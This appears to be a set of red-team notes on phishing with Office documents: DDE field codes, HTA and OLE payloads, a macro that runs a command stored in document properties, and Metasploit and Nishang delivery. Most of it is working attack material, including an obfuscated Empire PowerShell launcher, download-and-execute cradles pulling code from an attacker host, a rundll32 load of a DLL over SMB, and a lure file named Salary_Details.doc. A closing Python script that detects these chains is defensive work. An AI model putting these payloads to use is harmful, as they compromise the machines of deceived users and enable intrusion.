Phish

Phish Phish Phish …

  • DDE
  • HTA
  • OLE
  • smb_delivery
  • web_delivery

DDE

  • Create a listener, then generate a PowerShell launcher with Empire:
(Empire: listeners) > launcher powershell New
CMd.exE /c "Set EjBM= SET-ITEm ("VaR"+"iAbL"+"E:"+"V"+"T7JH") ( [TyPE]("{8}{0}{5}{10}{9}{3}{2}{7}{1}{4}{11}{6}{12}" -F'c','R','s','ry[','inG,','TIonS.Ge','YStEM.ObjEC','T','coLlE','.dIctIoNA','NeriC','s','t') ) ; $Ksc5U = [tyPe]("{1}{3}{0}{2}"-f 'Tb','sCrI','LOCK','p') ;SEt-item ("vArIA"+"bLe:"+"g"+"FN"+"A") ( [type]("{0}{1}" -F 'r','Ef')) ; sEt-VARIabLE ("5a"+"q") ( [TYpE]("{4}{6}{2}{7}{0}{5}{1}{3}"-f 'Ointm','N','erVI','aGEr','sySTe','a','M.NeT.s','cep')) ; sEt-itEm ("VAr"+"I"+"ABlE"+":PTd5") ( [TyPE]("{3}{0}{2}{1}" -f'm.Ne','bReQUest','t.WE','SYsTE') ) ;$rbT = [tYpe]("{4}{0}{3}{2}{1}{5}" -F'Net.crED','lcAC','tia','eN','sYStEm.','HE') ; seT ("e"+"78") ([TYPE]("{2}{3}{0}{1}{5}{4}" -F 'm.T','EXT','SYst','E','ODInG','.enC') );If(${ ...
  • Save the launcher on a web server.
  • Create a Word document and insert the following as a field code:

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://192.168.1.226:8000/evil');powershell

  • When the document is opened, the stager runs and the agent checks in to the listener.

HTA

  • Generate the HTA payload and put it on a web server:
(Empire: stager/windows/hta) > execute

[*] Stager output written out to: /tmp/hello.hta

(Empire: stager/windows/hta) >
  • Use social-engineering techniques to get the target to download and run the .hta file.

OLE

  • Create a .bat launcher in Empire.
  • Embed it in a Word document as an OLE object.
  • Use social engineering to get the target to run the file.
  • The agent checks in.

Document Properties

  • Create a Metasploit smb_delivery payload; the module serves a DLL over an SMB share:
msf exploit(smb_delivery) > show options

Module options (exploit/windows/smb/smb_delivery):

Name         Current Setting  Required  Description
----         ---------------  --------  -----------
FILE_NAME    test.dll         no        DLL file name
FOLDER_NAME                   no        Folder name to share (Default none)
SHARE                         no        Share (Default Random)
SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT      445              yes       The local port to listen on.


Exploit target:

Id Name
-- ----
0 DLL

msf exploit(smb_delivery) > run
[*] Exploit running as background job 4.

[*] Started reverse TCP handler on 192.168.1.226:1234
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\192.168.1.226\OJjhxT\test.dll,0

msf exploit(smb_delivery) >
  • Create a Word document and put the rundll32 command from the module output in the document's Comments property.
  • Add the following macro:
Sub kth()
    Dim p As DocumentProperty
    ' Walk the built-in document properties and run whatever is stored in "Comments"
    For Each p In ActiveDocument.BuiltInDocumentProperties
        If p.Name = "Comments" Then
            Shell (p.Value)
        End If
    Next
End Sub
  • When the macro runs, the command in the Comments property is executed: rundll32 loads the DLL from the SMB share and the handler receives the session.

Metasploit and Nishang

  • Create a web_delivery payload with Metasploit:
msf exploit(web_delivery) > run
[*] Exploit running as background job 2.

[*] Started reverse TCP handler on 192.168.1.226:4444
[*] Using URL: http://0.0.0.0:8080/D51fxh4MH
[*] Local IP: http://192.168.1.226:8080/D51fxh4MH
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $i=new-object net.webclient;$i.proxy=[Net.WebRequest]::GetSystemWebProxy();$i.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $i.downloadstring('http://192.168.1.226:8080/D51fxh4MH');
msf exploit(web_delivery) >
  • Create Word, Excel or .lnk files with the Nishang client modules (Out-Word shown here):
PS C:\Users\Kyaw Thiha\Documents> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.226:8000/Out-Word.ps1")
PS C:\Users\Kyaw Thiha\Documents> out-word -Payload "powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://192.168.1.226:8080/D51fxh4MH'); "
Saved to file C:\Users\Kyaw Thiha\Documents\Salary_Details.doc
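Defensive counterpart to the chains above, added here as an example (it is not code from the original notes or from Empire, Metasploit or Nishang): every one of them ends with an Office process starting cmd.exe, powershell.exe, rundll32.exe or mshta.exe, and the command lines carry recognisable markers (a DownloadString cradle, IEX, hidden PowerShell, a UNC path handed to rundll32). The script classifies constructed process-creation records with those rules; the Sysmon-style field names and the WINWORD.EXE path are assumptions.

```python
"""Detect the Office-document delivery chains from these notes in process-creation
records (Sysmon Event ID 1 style fields; all values here are constructed).
Added example, not code from the original notes or from Empire/Metasploit/Nishang."""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Children an Office app rarely needs; DDE, OLE objects and macros lean on them.
SUSPECT_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe", "mshta.exe", "wscript.exe"}

# Command-line markers, tagged with the chain they point at.
MARKERS = [
    ("download cradle (web_delivery / DDE stager)", re.compile(r"downloadstring\s*\(", re.I)),
    ("in-memory execution (IEX)", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("hidden, non-interactive PowerShell", re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.I)),
    ("rundll32 loading a DLL from a UNC path (smb_delivery)", re.compile(r"rundll32(\.exe)?\s+\\\\\S+", re.I)),
    ("HTA host launched", re.compile(r"\bmshta(\.exe)?\b", re.I)),
]

def classify(event):
    """Return the reasons an event matches one of these chains (empty list = benign)."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    child = event["image"].rsplit("\\", 1)[-1].lower()
    reasons = [f"{parent} spawned {child}"] if parent in OFFICE_APPS and child in SUSPECT_CHILDREN else []
    reasons += [label for label, rx in MARKERS if rx.search(event["command_line"])]
    return reasons

def scan(events):
    """Index -> reasons for every flagged event."""
    return {i: r for i, e in enumerate(events) if (r := classify(e))}

# Constructed records; the two suspicious command lines are the ones quoted in the notes.
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\rundll32.exe", "parent_image": WINWORD,
     "command_line": r"rundll32.exe \\192.168.1.226\OJjhxT\test.dll,0"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_image": WINWORD,
     "command_line": "powershell.exe -nop -w hidden -c $i=new-object net.webclient;"
                     "IEX $i.downloadstring('http://192.168.1.226:8080/D51fxh4MH');"},
    {"image": r"C:\Windows\splwow64.exe", "parent_image": WINWORD,  # benign print spooler helper
     "command_line": r"C:\Windows\splwow64.exe 12288"},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL"},  # benign: local DLL, not UNC
]

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: {SAMPLE_EVENTS[i]['command_line'][:60]}")
        for reason in reasons:
            print("   -", reason)
```

The two benign records (the print-spooler helper and rundll32 with a local DLL) stay unflagged, which is the part worth checking before pointing a rule like this at real telemetry.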